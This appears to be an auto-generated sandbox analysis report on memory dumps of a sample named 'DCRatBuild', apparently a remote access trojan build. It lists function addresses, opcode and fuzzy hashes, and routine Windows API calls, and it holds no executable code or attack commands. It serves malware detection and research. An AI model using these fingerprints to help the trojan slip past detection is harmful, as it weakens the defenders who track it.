Opcode ID: b0fcf9f2ff4684142e285ab6d369dfbade05db111452049364dee3b937c25791
Instruction ID: e1733401daf76354b5b278e53ee6e9bc3b4db4e9d2ada4c0e253d2ad6fc7904a
Opcode Fuzzy Hash: b0fcf9f2ff4684142e285ab6d369dfbade05db111452049364dee3b937c25791
Instruction Fuzzy Hash: 8B31D274901229ABCB61DF24DC89BDCBBB8BF09310F5041EAE41CA7261EB749F818F44

Function 0009B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0009B4DB

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: dc247f12140e7d6963faf12f79f439baa42cb128f52e3dcc67130d6297094f2d
Instruction ID: 3cd83f0049a745e8f765d5dfb4ffb1a0ffbaa4406ddd15b61c8c2903eb98cf36
Opcode Fuzzy Hash: dc247f12140e7d6963faf12f79f439baa42cb128f52e3dcc67130d6297094f2d
Instruction Fuzzy Hash: 86310471900249AFCF24DE78DD84EFA7BFDDB85324F0441A8F91897252EB309E45AB50

Function 0008AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0008AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,000AE72C,?,?), ref: 0008AF84

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a187431731cfdd370017d6a7659cf16853e9a0114bfcffa817fc8be2eff7fa10
Instruction ID: 0793d82577d1b8597b14005241a45115ee9db1089ad0f8036d06f8baa9f5227c
Opcode Fuzzy Hash: a187431731cfdd370017d6a7659cf16853e9a0114bfcffa817fc8be2eff7fa10
Instruction Fuzzy Hash: E201717A200349ABE7109FA4DC45F9E77BCEF09710F005022FB0597151D3749915CBA5

Function 00076C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00076DDF,00000000,00000400), ref: 00076C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00076C95

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: bdf12823ca950193a7410a5f7cfd3442fc01d8771ed305a1466f3f6f6bc7dec9
Instruction ID: 7bd058a28ea401408448eefd2f95886fc68a1818c84947913e04776c554c17d1
Opcode Fuzzy Hash: bdf12823ca950193a7410a5f7cfd3442fc01d8771ed305a1466f3f6f6bc7dec9
Instruction Fuzzy Hash: 57D0C931344700BFFA560BA18D06F2B7B99BF46B51F18C404B79AE80E0CA799424A629

Function 000A19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000A19EF,?,?,00000008,?,?,000A168F,00000000), ref: 000A1C21

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: a216dd4eb355d13e068559daff0dd3f526c22c5a764f6cc76da41ae0cdc70430
Instruction ID: dd16f68e365167d2c7510085e0ecf22b7630970c156381b88be3dff62b4415d3
Opcode Fuzzy Hash: a216dd4eb355d13e068559daff0dd3f526c22c5a764f6cc76da41ae0cdc70430
Instruction Fuzzy Hash: C3B16F35220608DFD755CF68C48ABA57BE0FF46364F298658E89ACF2A1C335ED91CB40

Function 0008F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0008F66A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: fe8afa86fd1970f09f7fb592c1898828167d7eaebbbe4e2fd75a97d1070e9561
Instruction ID: db8713c98b5b2f1501e12aa8d5b1540eaa010e2aad6603119b6dd8b89bfae74c
Opcode Fuzzy Hash: fe8afa86fd1970f09f7fb592c1898828167d7eaebbbe4e2fd75a97d1070e9561
Instruction Fuzzy Hash: F6518CB190560A9FFB64CFA4E8817BEBBF0FB48344F24843AD841EB250D7789940CB60

Function 0007B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0007B16B

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 22dec3cca0f7702e59dab39dba3289c7b5dbdef3df6f54089eebf344c929f655
Instruction ID: c5b5e9a79a9ef073630367d3b8d90b2107d23e36c54ac13c8a48dc4b77419fbb
Opcode Fuzzy Hash: 22dec3cca0f7702e59dab39dba3289c7b5dbdef3df6f54089eebf344c929f655
Instruction Fuzzy Hash: A5F030B4D106488FEB18DB18ECA5AD973F1FB49315FA08395D61993390D3B8A9C08E64

Function 000740FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 000741BC

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 766d1177fa7d52cfc80e23f0b90356d42cc3f004347c2fb5fbd1d7029233419d
Instruction ID: 011a8a903d9e134ca90473b4fc58901221efcbb09af3bdb3510307d916bfe879
Opcode Fuzzy Hash: 766d1177fa7d52cfc80e23f0b90356d42cc3f004347c2fb5fbd1d7029233419d
Instruction Fuzzy Hash: C4C14772A183418FC354CF29D88065AFBE1BFC9208F19892DE9D8D7311D734E945CB96

Function 0008F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0008F3A5), ref: 0008F9DA

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 46a6f00e95adc760d2c4fcc0bb26e443f247ae8103af55f02bdc73744f68e7d7
Instruction ID: c3463384128e2e6b98b57fabd7bd19cc3b58c54437c2447bc0d5919c239ed5e5
Opcode Fuzzy Hash: 46a6f00e95adc760d2c4fcc0bb26e443f247ae8103af55f02bdc73744f68e7d7
Instruction Fuzzy Hash:

Function 000862CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction ID: 8d4279737b0e9c6f95feeb65fab474c55f862e8d60b971c88495b55260bfaeaa
Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction Fuzzy Hash: FA620771604B849FCB25DF28C4906B9BBE1BF95304F09C96EE8EA8B342D735E945CB11

Function 000877EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction ID: d86e9394c1a5f023789ecd7d75e0a703589de92f229241d222a413b425f396f4
Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction Fuzzy Hash: 3A62E6716083458FCB19DF28C8846B9BBE1BFD5304F18896DE9DA8B34AD730E945CB15

Function 0007F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction ID: 351453e420355d11e0bcbad65b2542de917810e86b7ebc5b620290c7890d7365
Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction Fuzzy Hash: 07525A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 00087153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471513f2b67e16b40788e53a39202d7b5c1662b3f0bdb14284be62bd0d6ff241
Instruction ID: aceefd7b7688efdf516a16904e0225c0cab9caae446dde0c77c986a2d1d28d75
Opcode Fuzzy Hash: 471513f2b67e16b40788e53a39202d7b5c1662b3f0bdb14284be62bd0d6ff241
Instruction Fuzzy Hash: CB12C2B16087068FC728DF28C494AB9B7E0FB94304F24892EE9DAC7685E774E594CB45

Function 0007C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a967726eafd8e8b3b370fa428fd7a4dc5f259c80e1737363455814da9a244722
Instruction ID: f47320cd3cfb8ede0af89bc75b1aa9d9f27bea7f1c0366bf60c88fb12ec29b7f
Opcode Fuzzy Hash: a967726eafd8e8b3b370fa428fd7a4dc5f259c80e1737363455814da9a244722
Instruction Fuzzy Hash: D6F1B071A083018FE798CF28C48896EBBE1EFC9314F158A2EF5C9D7252D635D945CB4A

Function 0007E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1da4d6d15cb17fdc9ee9842f65a56e35355bcdf1011846cb37485dd0596f089
Instruction ID: 9f6101bc4a3b971c3cbec7cfc6bbda2cb83a0bd8ceae39ecf01e8d6eed2214af
Opcode Fuzzy Hash: a1da4d6d15cb17fdc9ee9842f65a56e35355bcdf1011846cb37485dd0596f089
Instruction Fuzzy Hash: 5DE14D755083949FC344CF19D8904AABFF0EF9A300F454AAEF9D497352C239EA19DB92

Function 00084088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction ID: 02fd044e2e262d0c80813acd82183c45147d77cf897013a3b94f70ad922d75ff
Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: 4C9154B060434A8BDB24FE64D894BFE77D4FBA1300F50092CF9DA87282EE68A545C352

Function 000843BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 88973289f2d7bc0512c373d688b5ad2f9cc2e2d347695128025a320cf469ec28
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 578137B17047474BDB74FE68C8D4BBE37D4BB91308F00492DE9CA8B283DE6499868756

Function 000951C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f7aaac191ba1b740ab6c04d43df12fb1f8c98445cfbb579dafbe55123e1e7f
Instruction ID: 8f8121735b94bb49cbe001004c123c77f0b9054185651c39e5c94cff965d367f
Opcode Fuzzy Hash: e7f7aaac191ba1b740ab6c04d43df12fb1f8c98445cfbb579dafbe55123e1e7f
Instruction Fuzzy Hash: 90617731600F0866DEBB9B6BAC967FE23D4EB13743F144619E882DF282D651DE42B711

Function 00094F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 4f20e6d584f22d9e3c040e712c86f6b91cba7652ea792b3505c8e5e9b64d5126
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: D3516A20204F4557DFB74A6A8C6AFFF23D59B82303F180929E982C7293D605ED46F391

Function 0007EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762456c3baa6f7c01d08c710cbc0d9aac515f1e368747ffd875ea6da3a24e02c
Instruction ID: 73ef79f05cca1813ebb1ee75fde890c2dad7afbff338cf0ab1f786e813454132
Opcode Fuzzy Hash: 762456c3baa6f7c01d08c710cbc0d9aac515f1e368747ffd875ea6da3a24e02c
Instruction Fuzzy Hash: 4951C5319093D68EC711CF38C5404BEBFE0AF9A314F4949ADE4DD5B243C225DA8ACB66

Function 000800B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f97bd4f91f8ee13d40786c5f829e8aeb41b69550a9ecc42ea46406d621a5b3a
Instruction ID: 0e065932df3e688eda3532181f829863237ba06b4d533d8654a7e2a1794d5847
Opcode Fuzzy Hash: 4f97bd4f91f8ee13d40786c5f829e8aeb41b69550a9ecc42ea46406d621a5b3a
Instruction Fuzzy Hash: DD51D0B1A087159FC788CF19D48055AF7E1FF88314F058A2EE899E3340D735E959CB96

Function 00083E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

